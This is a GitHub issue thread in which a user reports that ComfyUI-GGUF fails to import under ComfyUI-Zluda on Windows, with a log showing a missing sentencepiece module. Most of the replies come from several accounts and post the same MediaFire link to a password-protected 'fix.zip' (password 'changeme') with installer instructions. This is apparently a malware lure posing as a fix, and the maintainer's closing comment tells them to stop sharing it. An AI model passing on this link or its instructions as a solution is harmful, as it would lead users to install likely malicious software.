### ISSUE TITLE
comfyui fails to import comfyui gguf

### ISSUE THREAD

**Issue by AGx3x2x1** [patientx/ComfyUI-Zluda#18]
### Your question

im using comfyui zluda on windows 11 
6900 xt
7800x3d
16 gb ddr5 
im trying to use comfyui gguf but it fails to import i tried installing manually and through manager but it gives me import fail
i checked sentencepiece it says requirement satisfied in comfyui folder

### Logs

```powershell
Device: cuda:0 AMD Radeon RX 6900 XT [ZLUDA] : native
Using sub quadratic optimization for cross attention, if you have memory or speed issues try using: --use-split-cross-attention
[Prompt Server] web root: F:\comfyui\ComfyUI-Zluda\web
Traceback (most recent call last):
  File "F:\comfyui\ComfyUI-Zluda\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 995, in exec_module
  File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
  File "F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-GGUF\__init__.py", line 7, in <module>
    from .nodes import NODE_CLASS_MAPPINGS
  File "F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-GGUF\nodes.py", line 3, in <module>
    import gguf
  File "F:\comfyui\ComfyUI-Zluda\venv\Lib\site-packages\gguf\__init__.py", line 7, in <module>
    from .vocab import *
  File "F:\comfyui\ComfyUI-Zluda\venv\Lib\site-packages\gguf\vocab.py", line 10, in <module>
    from sentencepiece import SentencePieceProcessor
ModuleNotFoundError: No module named 'sentencepiece'

Cannot import F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-GGUF module for custom nodes: No module named 'sentencepiece'
### Loading: ComfyUI-Impact-Pack (V7.2.2)
### Loading: ComfyUI-Impact-Pack (Subpack: V0.6)
[Impact Pack] Wildcards loading done.
### Loading: ComfyUI-Manager (V2.50.2)
### ComfyUI Revision: 2650 [902d97af] | Released on '2024-08-25'

Import times for custom nodes:
   0.0 seconds: F:\comfyui\ComfyUI-Zluda\custom_nodes\websocket_image_save.py
   0.0 seconds: F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-deepcache
   0.0 seconds (IMPORT FAILED): F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-GGUF
   0.5 seconds: F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
   1.1 seconds: F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-Impact-Pack

Starting server

To see the GUI go to: http://127.0.0.1:8188
FETCH DATA from: F:\comfyui\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager\extension-node-map.json [DONE]
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/alter-list.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/model-list.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/github-stats.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/extension-node-map.json
[ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/custom-node-list.json
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by patientx** [comment]
stop sharing that file
